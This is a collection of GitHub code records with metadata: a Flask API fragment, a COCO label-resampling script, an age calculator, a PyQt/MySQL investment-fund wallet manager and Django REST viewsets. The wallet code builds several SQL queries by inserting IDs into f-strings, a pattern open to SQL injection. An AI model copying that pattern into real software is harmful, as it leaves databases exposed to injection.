res.append(r)\n return jsonify(res)\n", "repo_name": "batulin-s/test", "sub_path": "school.py", "file_name": "school.py", "file_ext": "py", "file_size_in_byte": 2193, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 45, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 45, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 52, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 57, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 57, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 58, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 58, "usage_type": "name"}, {"api_name": "flask.request.args.keys", "line_number": 59, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 60, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 60, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "32786183884", "text": "\"\"\"\r\nTODO\r\n1、原始的类别分布\r\n2、将每一张图片的标签重新组合,组成多种label,称为resplit. 计算类别分布\r\n3、使用 resplit 后的图片resample,计算类别分布\r\n\r\n\"\"\"\r\nimport random\r\nimport numpy as np\r\nimport mmcv\r\n\r\n\r\n# metadata keys : 'gt_labels', 'class_freq', 'neg_class_freq',\r\n# 'condition_prob', 'img_ids', 'cls_data_list', 'class_split'\r\n\r\nmetadata = mmcv.load(\"/home/pengpeng/MLC/appendix/coco/longtail2017/metadata.pkl\")\r\n\r\nsplits = mmcv.load(\"../longtail2017/class_freq.pkl\")\r\n\r\nexit()\r\n\r\n\r\ndef dataSplits(groups=None, save_path=\"/home/pengpeng/ASL/appendix/coco/IncLearning/groups_id.pkl\"):\r\n metadata = mmcv.load(\"/home/pengpeng/MLC/appendix/coco/longtail2017/metadata.pkl\")\r\n img_ids = metadata[\"img_ids\"]\r\n gt_labels = np.array(metadata[\"gt_labels\"])\r\n\r\n num_classes = gt_labels.shape[1]\r\n num_groups = len(groups)\r\n\r\n ids = [[] for i in range(num_groups)]\r\n for i, group in enumerate(groups):\r\n mask = np.zeros(num_classes)\r\n mask[group] = 1\r\n temp_labels = gt_labels * mask\r\n temp_sum = np.sum(temp_labels, axis=1)\r\n for j in range(temp_sum.shape[0]):\r\n if temp_sum[j] > 0:\r\n ids[i].append(img_ids[j])\r\n\r\n mmcv.dump(ids, file=save_path)\r\n\r\n\r\n\r\nmetadata = mmcv.load(\"/home/pengpeng/MLC/appendix/coco/longtail2017/metadata.pkl\")\r\ngroups = metadata[\"class_split\"]\r\n\r\ndataSplits(groups)\r\n\r\ngroup_ids = mmcv.load(\"/home/pengpeng/ASL/appendix/coco/IncLearning/groups_id.pkl\")\r\n\r\nfor group_id in group_ids:\r\n print(len(group_id))\r\nexit()\r\n\r\npkl_data = mmcv.load(\"../appendix/coco/longtail2017/class_freq.pkl\")\r\n\r\nimg_ids = np.load(\"../appendix/coco/longtail2017/img_ids.npy\")\r\n\r\nsplits = mmcv.load(\"../appendix/coco/longtail2017/class_split.pkl\")\r\n\r\nprint(splits)\r\nexit()\r\nhead = list(splits[\"head\"])\r\nmiddle = list(splits[\"middle\"])\r\ntail = list(splits[\"tail\"])\r\n\r\ngt_labels = np.array(pkl_data[\"gt_labels\"])\r\n# 原始数据的数量\r\nprint(gt_labels.shape[0])\r\n\r\nmetadata = mmcv.load(\"../appendix/coco/longtail2017/metadata.pkl\")\r\nimg_ids = []\r\nfor i in range(80):\r\n img_id = []\r\n for j in range(gt_labels.shape[0]):\r\n if gt_labels[j, i] == 1:\r\n img_id.append(j)\r\n img_ids.append(img_id)\r\nmetadata[\"cls_data_list\"] = img_ids\r\n\r\nmmcv.dump(metadata, \"../appendix/coco/longtail2017/metadata.pkl\")\r\n\r\nexit()\r\n\r\nclass_freq = pkl_data[\"class_freq\"]\r\nprint(class_freq)\r\n\r\n# 按照数量从小到大的类别下标排序\r\n# ret_indexes = np.array(class_freq).argsort()\r\n# print(ret_indexes)\r\n\r\n# 将每一张图片的标签重新组合,组成多种 label\r\n# 不能将每一张图片都进行拆分,因为\r\n\r\nnew_labels = []\r\nmax_sum = 0\r\nfor i in range(gt_labels.shape[0]):\r\n if np.sum(gt_labels[i, head]) != 0 and np.sum(gt_labels[i, tail]) != 0:\r\n for j in head:\r\n if gt_labels[i, j] == 1:\r\n new_gt = np.copy(gt_labels[i])\r\n new_gt[head] = 0\r\n new_gt[j] = 1\r\n new_labels.append(new_gt)\r\n else:\r\n new_labels.append(gt_labels[i])\r\n\r\ndata = {}\r\nnew_labels = np.array(new_labels)\r\ndata[\"gt_labels\"] = new_labels\r\n\r\n# 计算新标签中每个类别的数量\r\nnew_class_freq = new_labels.sum(axis=0)\r\n# print(new_class_freq)\r\ndata[\"class_freq\"] = new_class_freq\r\nprint(new_labels.shape[0])\r\n\r\n# 为每个类别筛选其对应的新labels\r\nimg_ids = []\r\nfor i in range(80):\r\n img_id = []\r\n for j in range(new_labels.shape[0]):\r\n if new_labels[j, i] == 1:\r\n img_id.append(j)\r\n img_ids.append(img_id)\r\n\r\ndata[\"img_ids\"] = img_ids\r\n\r\nmmcv.dump(data, \"./seperate_tailAndHead.pkl\")\r\n\r\nrandom.seed(299)\r\nIMGNUM = 200\r\n\r\nresult = np.zeros([80])\r\n\r\nfor i in range(80):\r\n img_id = img_ids[i]\r\n length = len(img_id)\r\n # print(\"length\",len(img_id))\r\n for j in range(IMGNUM):\r\n sel = random.randint(0, length - 1)\r\n result += new_labels[img_id[sel]]\r\n\r\nprint(result)\r\n", "repo_name": "ckvic3/MLC", "sub_path": "utils/resample.py", "file_name": "resample.py", "file_ext": "py", "file_size_in_byte": 3959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mmcv.load", "line_number": 16, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 18, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 36, "usage_type": "call"}, {"api_name": "mmcv.dump", "line_number": 41, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 45, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 50, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 58, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "mmcv.load", "line_number": 72, "usage_type": "call"}, {"api_name": "mmcv.dump", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "mmcv.dump", "line_number": 130, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 135, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "34595615155", "text": "import datetime\n\n# def date_age(old_date):\n# '''\n# Calculates the age of an input date (string) by splitting the date into a list, using the datatime module\n# for the current date and finding the difference between the two.\n \n# INPUTS\n# old_date (str) = Date whose age is to be found.\n\n# OUTPUTS\n# age (int) = Age of the input date.\n# '''\n\n# old_date_list = (old_date.split('-'))\n# # print(old_date_list)\n# old_day = int(old_date_list[0])\n# old_month = int(old_date_list[1])\n# old_year = int(old_date_list[2])\n# # print(old_day)\n# current_time = datetime.datetime.now()\n# age = current_time.year - old_year - ((current_time.month, current_time.day) < (old_month, old_day))\n# return age\n\nold_date = input('Please enter a date in the format dd-mm-yyyy: ')\nold_date_list = (old_date.split('-'))\nold_day = int(old_date_list[0])\nold_month = int(old_date_list[1])\nold_year = int(old_date_list[2])\n# print(old_day)\ncurrent_time = datetime.datetime.now()\nage = current_time.year - old_year - ((current_time.month, current_time.day) < (old_month, old_day))\nprint(age)\n\n", "repo_name": "dawiddawidowski/sigma-prework", "sub_path": "age.py", "file_name": "age.py", "file_ext": "py", "file_size_in_byte": 1133, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "datetime.datetime.now", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}]} +{"seq_id": "32400171654", "text": "from msilib.schema import Error\nfrom PyQt5.QtWidgets import (QWidget, QDialog,QHBoxLayout,QPushButton,QTableWidgetItem,\n QTableWidget,QVBoxLayout,QApplication,QLabel)\nfrom PyQt5.QtCore import pyqtSignal,QSize\nfrom tools import FormControl,FormGroup,ComboBoxControl\nfrom dataBase import Sql_DB\nfrom messageBox import messageBoxDialog\nfrom period import getperiodNamesById\nfrom functools import partial\nimport mysql.connector as mc\n\nclass WalletChargeForm(QDialog):\n createNewOne=pyqtSignal(bool)\n def __init__(self,customer_id):\n super(WalletChargeForm,self).__init__()\n # setting window title\n self.setWindowTitle(\"Charging Wallet\")\n # setting geometry to the window\n self.setGeometry(700, 150, 400, 400)\n self.formGroupBox = FormGroup()\n self.formGroupBox.groupValidation.connect(self.formValidation)\n content=getTotal(customer_id)\n self.chargePrice=FormControl('charge Price')\n self.chargePrice.required=True\n self.chargePrice.number=True\n self.formGroupBox.addControl(self.chargePrice)\n self.customer_id=customer_id\n\n self.buttonBox = QHBoxLayout()\n self.saveButton=QPushButton('save')\n self.saveButton.setDisabled(True)\n self.cancleButton=QPushButton('cancle')\n self.buttonBox.addWidget(self.saveButton)\n self.buttonBox.addWidget(self.cancleButton)\n self.content_lable=QLabel(F\"The wallet has {content} Tooman\")\n # creating a vertical layout\n mainLayout = QVBoxLayout()\n # adding form group box to the layout\n mainLayout.addWidget(self.content_lable)\n mainLayout.addWidget(self.formGroupBox)\n # adding button box to the layout\n mainLayout.addLayout(self.buttonBox)\n # setting lay out\n self.setLayout(mainLayout)\n self.saveButton.clicked.connect(self.accept)\n self.cancleButton.clicked.connect(self.reject)\n\n def formValidation(self, is_valid):\n if is_valid:\n self.saveButton.setEnabled(True)\n else:\n self.saveButton.setDisabled(True)\n def accept(self):\n self.saveCharging()\n self.close()\n def saveCharging(self):\n try:\n mydb =Sql_DB()\n myConnection=mydb.db_connect()\n mycursor = myConnection.cursor()\n charge_price=self.chargePrice.form_control.text()\n sql = \"\"\"INSERT INTO wallet (type,customerId,amount) \n VALUES (%s,%s,%s)\"\"\"\n val = (True,self.customer_id,charge_price)\n mycursor.execute(sql, val)\n myConnection.commit()\n messageBoxDialog.show_info_messagebox(\"the wallet has been charged successfully\")\n self.createNewOne.emit(True)\n except mc.Error as e:\n print(e) \nclass WalletListForInvestor(QWidget) :\n update_tabel=pyqtSignal(bool)\n def __init__(self,investor_id):\n super().__init__()\n self.setMinimumSize(QSize(400, 700))\n self.setWindowTitle(\"Content of This Wallet\")\n self.superLayout=QVBoxLayout(self)\n charge_wal_btn=QPushButton(\"Charge this wallet\")\n charge_wal_btn.clicked.connect(partial(self.chargeWallet,investor_id))\n trns_wal_btn=QPushButton(\"Transfer the content of wallet\")\n trns_wal_btn.clicked.connect(partial(self.transferWalletContent,investor_id))\n self.button_layout=QHBoxLayout()\n self.button_layout.addWidget(charge_wal_btn)\n self.button_layout.addWidget(trns_wal_btn)\n self.wallet_table=self.walletTable(investor_id)\n self.superLayout.addLayout(self.button_layout)\n self.superLayout.addWidget(self.wallet_table)\n def chargeWallet(self,inv_id):\n form=WalletChargeForm(inv_id)\n form.createNewOne.connect(partial(self.updateTable,inv_id))\n form.exec_()\n def transferWalletContent(self,inv_id):\n form=WalletTransitionForm(inv_id)\n form.createNewOne.connect(partial(self.updateTable,inv_id))\n form.exec_()\n def updateTable(self,investor_id):\n data=self.getWallets(investor_id) \n table=self.wallet_table\n table.setColumnCount(4)\n table.setRowCount(len(data))\n table.setMinimumWidth(1000)\n table.setMinimumHeight(500)\n table.setHorizontalHeaderLabels([\"Date\",\"Amount\",\"Type\",\"content\"])\n content=0\n for n,rec in enumerate(data):\n date_item=QTableWidgetItem(str(rec[0]))\n amount_item=QTableWidgetItem(str(rec[1]))\n type=\"charged\" if rec[2] else \"Dischared\"\n type_item=QTableWidgetItem(type)\n content=content+rec[1] if rec[2] else content-rec[1] \n content_item=QTableWidgetItem(str(content))\n table.setItem(n,0,date_item)\n table.setItem(n,1,amount_item)\n table.setItem(n,2,type_item)\n table.setItem(n,3,content_item)\n table.resizeColumnsToContents()\n table.resizeRowsToContents() \n def walletTable(self,investor_id):\n data=self.getWallets(investor_id) \n table=QTableWidget()\n table.setColumnCount(4)\n table.setRowCount(len(data))\n table.setMinimumWidth(1000)\n table.setMinimumHeight(500)\n table.setHorizontalHeaderLabels([\"Date\",\"Amount\",\"Type\",\"content\"])\n content=0\n for n,rec in enumerate(data):\n date_item=QTableWidgetItem(str(rec[0]))\n amount_item=QTableWidgetItem(str(rec[1]))\n type=\"charged\" if rec[2] else \"Dischared\"\n type_item=QTableWidgetItem(type)\n content=content+rec[1] if rec[2] else content-rec[1] \n content_item=QTableWidgetItem(str(content))\n table.setItem(n,0,date_item)\n table.setItem(n,1,amount_item)\n table.setItem(n,2,type_item)\n table.setItem(n,3,content_item)\n table.resizeColumnsToContents()\n table.resizeRowsToContents() \n return table\n def getWallets(self,inv_id):\n try:\n connection=Sql_DB().db_connect()\n my_cursor=connection.cursor()\n wallet_query=F\"\"\"SELECT createDate,\n amount,type\n FROM wallet\n WHERE customerId='{inv_id}'\n \"\"\"\n my_cursor.execute(wallet_query)\n wallet_content=my_cursor.fetchall()\n return wallet_content\n except mc.Error as e:\n messageBoxDialog.show_critical_messagebox(F\"{e}\") \nclass WalletTransitionForm(QDialog):\n createNewOne=pyqtSignal(bool)\n def __init__(self,customer_id):\n super(WalletTransitionForm,self).__init__()\n # setting window title\n self.setWindowTitle(\"Wallet Content Transition\")\n # setting geometry to the window\n self.setGeometry(700, 150, 400, 400)\n self.formGroupBox = FormGroup()\n self.formGroupBox.groupValidation.connect(self.formValidation)\n self.customer_id=customer_id\n content=getTotal(customer_id)\n self.transition_amount=FormControl('Transition Amount')\n self.transition_amount.required=True\n self.transition_amount.number=True\n self.transition_amount.range(0,content)\n\n self.periodNameDict,temp=getperiodNamesById()\n self.target_period=ComboBoxControl(self,list(self.periodNameDict.keys()),\"Target Period\")\n self.target_period.required=True\n\n self.formGroupBox.addControl(self.transition_amount)\n self.buttonBox = QHBoxLayout()\n self.saveButton=QPushButton('save')\n self.saveButton.setDisabled(True)\n self.cancleButton=QPushButton('cancle')\n self.buttonBox.addWidget(self.saveButton)\n self.buttonBox.addWidget(self.cancleButton)\n self.content_lable=QLabel(F\"The wallet has {content} Tooman\")\n # creating a vertical layout\n mainLayout = QVBoxLayout()\n # adding form group box to the layout\n mainLayout.addWidget(self.content_lable)\n mainLayout.addWidget(self.target_period)\n mainLayout.addWidget(self.formGroupBox)\n # adding button box to the layout\n mainLayout.addLayout(self.buttonBox)\n # setting lay out\n self.setLayout(mainLayout)\n self.saveButton.clicked.connect(self.accept)\n self.cancleButton.clicked.connect(self.reject)\n\n def formValidation(self, is_valid):\n if is_valid:\n self.saveButton.setEnabled(True)\n else:\n self.saveButton.setDisabled(True)\n def accept(self):\n self.saveTransition()\n self.close()\n def saveTransition(self):\n try:\n mydb =Sql_DB()\n myConnection=mydb.db_connect()\n mycursor = myConnection.cursor()\n\n amount=int(self.transition_amount.form_control.text())\n target_period=self.periodNameDict.get(self.target_period.form_control.currentText())\n \n discharge_sql = \"\"\"INSERT INTO wallet (type,customerId,amount) \n VALUES (%s,%s,%s)\"\"\"\n val = (False,self.customer_id,amount)\n mycursor.execute(discharge_sql, val)\n myConnection.commit()\n check_query=F\"\"\"SELECT Id,Amount \n FROM payments\n WHERE CustomerId='{self.customer_id}' and PeriodId='{target_period}'\"\"\"\n mycursor.execute(check_query)\n isExist=mycursor.fetchone()\n if isExist:\n update_query=F\"\"\"UPDATE payments set amount='{isExist[1]+amount}' \n WHERE Id='{isExist[0]}'\"\"\"\n mycursor.execute(update_query)\n myConnection.commit() \n messageBoxDialog.show_info_messagebox(\"the money has been transmited to payment successfully\") \n return\n payment_sql=\"\"\" INSERT INTO payments (status,customerId,PeriodId,amount) VALUES (%s,%s,%s,%s)\"\"\"\n val=(1,self.customer_id,target_period,amount)\n mycursor.execute(payment_sql,val)\n myConnection.commit()\n messageBoxDialog.show_info_messagebox(\"the money has been transmited successfully\")\n self.createNewOne.emit(True)\n except mc.Error as e:\n messageBoxDialog.show_critical_messagebox(f\"{e}\")\nclass WalletList(QWidget):\n update_tabel=pyqtSignal(bool)\n def __init__(self):\n super().__init__()\n self.setMinimumSize(QSize(400, 700))\n self.setWindowTitle(\"List Of Wallets\")\n self.superLayout=QVBoxLayout(self)\n self.wallet_table=self.walletTable()\n self.superLayout.addWidget(self.wallet_table)\n\n def updateTable(self):\n print(\"\")\n def walletTable(self):\n data=self.getWallets() \n table=QTableWidget()\n table.setColumnCount(2)\n table.setRowCount(len(data))\n table.setMinimumWidth(1000)\n table.setMinimumHeight(500)\n table.setHorizontalHeaderLabels([\"customer\",\"content\"])\n n=0\n for key in data:\n tableItem=QTableWidgetItem(str(key))\n tableItem1=QTableWidgetItem(str(data[key]))\n table.setItem(n,0,tableItem)\n table.setItem(n,1,tableItem1)\n n+=1\n table.resizeColumnsToContents()\n table.resizeRowsToContents() \n return table\n def getWallets(self):\n try:\n print(\"\")\n connection=Sql_DB().db_connect()\n my_cursor=connection.cursor()\n wallet_query=\"\"\"SELECT content,\n TYPE , customerId, name, family\n FROM customers\n JOIN (\n\n SELECT SUM( amount ) AS content,\n TYPE , customerId\n FROM wallet\n GROUP BY customerId,\n TYPE\n )W ON customers.id = W.customerId\"\"\"\n my_cursor.execute(wallet_query)\n wallets=my_cursor.fetchall()\n wal_dic={}\n for rec in wallets:\n if not wal_dic.get(F\"{rec[3]} {rec[4]} ({rec[2]})\"):\n wal_dic[F\"{rec[3]} {rec[4]} ({rec[2]})\"]=0\n if rec[1]:#type of wallet record is charged\n wal_dic[F\"{rec[3]} {rec[4]} ({rec[2]})\"]+=rec[0]\n else: #type of wallet record is discharged\n wal_dic[F\"{rec[3]} {rec[4]} ({rec[2]})\"]-=rec[0]\n return wal_dic\n\n except mc.Error as e:\n messageBoxDialog.show_critical_messagebox(F\"{e}\") \ndef getTotal(customer_id):\n total_charge=0\n total_discharge=0\n try:\n connection=Sql_DB().db_connect()\n mycursor=connection.cursor()\n query=F\"\"\"SELECT SUM(amount),Type \n FROM wallet \n WHERE customerId='{customer_id}' \n GROUP BY Type\n \"\"\"\n mycursor.execute(query)\n res=mycursor.fetchall()\n for rec in res:\n if rec[1]:\n total_charge=rec[0]\n else:\n total_discharge=rec[0]\n wallet_content=total_charge-total_discharge\n return wallet_content\n except mc.Error as e:\n messageBoxDialog.show_critical_messagebox(f\"{e}\") \n\nif __name__==\"__main__\":\n import sys\n app=QApplication(sys.argv)\n #ui=WalletList()\n ui=WalletTransitionForm(1001)\n ui.show()\n sys.exit(app.exec_())\n", "repo_name": "fahime87/ehasnovin_investment_fund", "sub_path": "wallet.py", "file_name": "wallet.py", "file_ext": "py", "file_size_in_byte": 13691, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 12, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 13, "usage_type": "call"}, {"api_name": "tools.FormGroup", "line_number": 20, "usage_type": "call"}, {"api_name": "tools.FormControl", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 37, "usage_type": "call"}, {"api_name": "dataBase.Sql_DB", "line_number": 58, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog.show_info_messagebox", "line_number": 67, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 67, "usage_type": "name"}, {"api_name": "mysql.connector.Error", "line_number": 69, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 69, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 71, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 72, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 77, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 78, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 80, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 82, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 90, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 94, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 106, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 107, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 109, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 120, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 129, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 131, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 133, "usage_type": "call"}, {"api_name": "dataBase.Sql_DB", "line_number": 143, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 153, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 153, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_critical_messagebox", "line_number": 154, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 154, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 155, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 156, "usage_type": "call"}, {"api_name": "tools.FormGroup", "line_number": 163, "usage_type": "call"}, {"api_name": "tools.FormControl", "line_number": 167, "usage_type": "call"}, {"api_name": "period.getperiodNamesById", "line_number": 172, "usage_type": "call"}, {"api_name": "tools.ComboBoxControl", "line_number": 173, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 177, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 178, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 180, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 183, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 185, "usage_type": "call"}, {"api_name": "dataBase.Sql_DB", "line_number": 207, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog.show_info_messagebox", "line_number": 229, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 229, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_info_messagebox", "line_number": 235, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 235, "usage_type": "name"}, {"api_name": "mysql.connector.Error", "line_number": 237, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 237, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_critical_messagebox", "line_number": 238, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 238, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 239, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 240, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 243, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 245, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidget", "line_number": 253, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 261, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 262, "usage_type": "call"}, {"api_name": "dataBase.Sql_DB", "line_number": 272, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 297, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 297, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_critical_messagebox", "line_number": 298, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 298, "usage_type": "name"}, {"api_name": "dataBase.Sql_DB", "line_number": 303, "usage_type": "call"}, {"api_name": "mysql.connector.Error", "line_number": 319, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 319, "usage_type": "name"}, {"api_name": "messageBox.messageBoxDialog.show_critical_messagebox", "line_number": 320, "usage_type": "call"}, {"api_name": "messageBox.messageBoxDialog", "line_number": 320, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 324, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 324, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 328, "usage_type": "call"}]} +{"seq_id": "9092142197", "text": "from rest_framework import mixins, status\r\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly\r\nfrom rest_framework.response import Response\r\nfrom rest_framework.viewsets import GenericViewSet\r\n\r\nfrom .models import Experience, Profile\r\nfrom .permissions import HasProfileAndIsOwnerPermission, IsProfileOwnerPermission\r\nfrom .serializers import ExperienceSerializer, ProfileSerializer\r\nfrom .services import check_user_has_profile, get_user_profile\r\n\r\n\r\nclass ProfileViewSet(\r\n mixins.CreateModelMixin,\r\n mixins.RetrieveModelMixin,\r\n mixins.UpdateModelMixin,\r\n mixins.DestroyModelMixin,\r\n GenericViewSet,\r\n):\r\n \"\"\"\r\n Set of Profile controllers.\r\n\r\n Creating profile. One user can has only one profile.\r\n \"\"\"\r\n\r\n queryset = Profile.objects.all()\r\n serializer_class = ProfileSerializer\r\n permission_classes = [IsAuthenticatedOrReadOnly, IsProfileOwnerPermission]\r\n\r\n def create(self, request, *args, **kwargs):\r\n if check_user_has_profile(request.user):\r\n return Response(\r\n {\"error\": \"Cannot create profile, when you have profile already\"}, status.HTTP_400_BAD_REQUEST\r\n )\r\n\r\n return super().create(request, *args, **kwargs)\r\n\r\n def perform_create(self, serializer):\r\n serializer.save(user=self.request.user)\r\n\r\n\r\nclass ExperienceViewSet(\r\n mixins.CreateModelMixin,\r\n mixins.RetrieveModelMixin,\r\n mixins.UpdateModelMixin,\r\n mixins.DestroyModelMixin,\r\n GenericViewSet,\r\n):\r\n \"\"\"\r\n Set of Experience controllers.\r\n\r\n Creating experience. User can create experience if he has profile.\r\n User can create many experiences.\r\n \"\"\"\r\n\r\n queryset = Experience.objects.all()\r\n serializer_class = ExperienceSerializer\r\n permission_classes = [IsAuthenticatedOrReadOnly, HasProfileAndIsOwnerPermission]\r\n\r\n def create(self, request, *args, **kwargs):\r\n profile = get_user_profile(request.user.pk)\r\n if not profile:\r\n return Response(\r\n {\"error\": \"Cannot create experience, when you don't have profile\"}, status.HTTP_400_BAD_REQUEST\r\n )\r\n serializer = self.get_serializer(data=request.data)\r\n serializer.is_valid(raise_exception=True)\r\n self.perform_create(serializer)\r\n headers = self.get_success_headers(serializer.data)\r\n return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)\r\n\r\n def perform_create(self, serializer) -> None:\r\n serializer.save(profile=self.request.user.profile)\r\n", "repo_name": 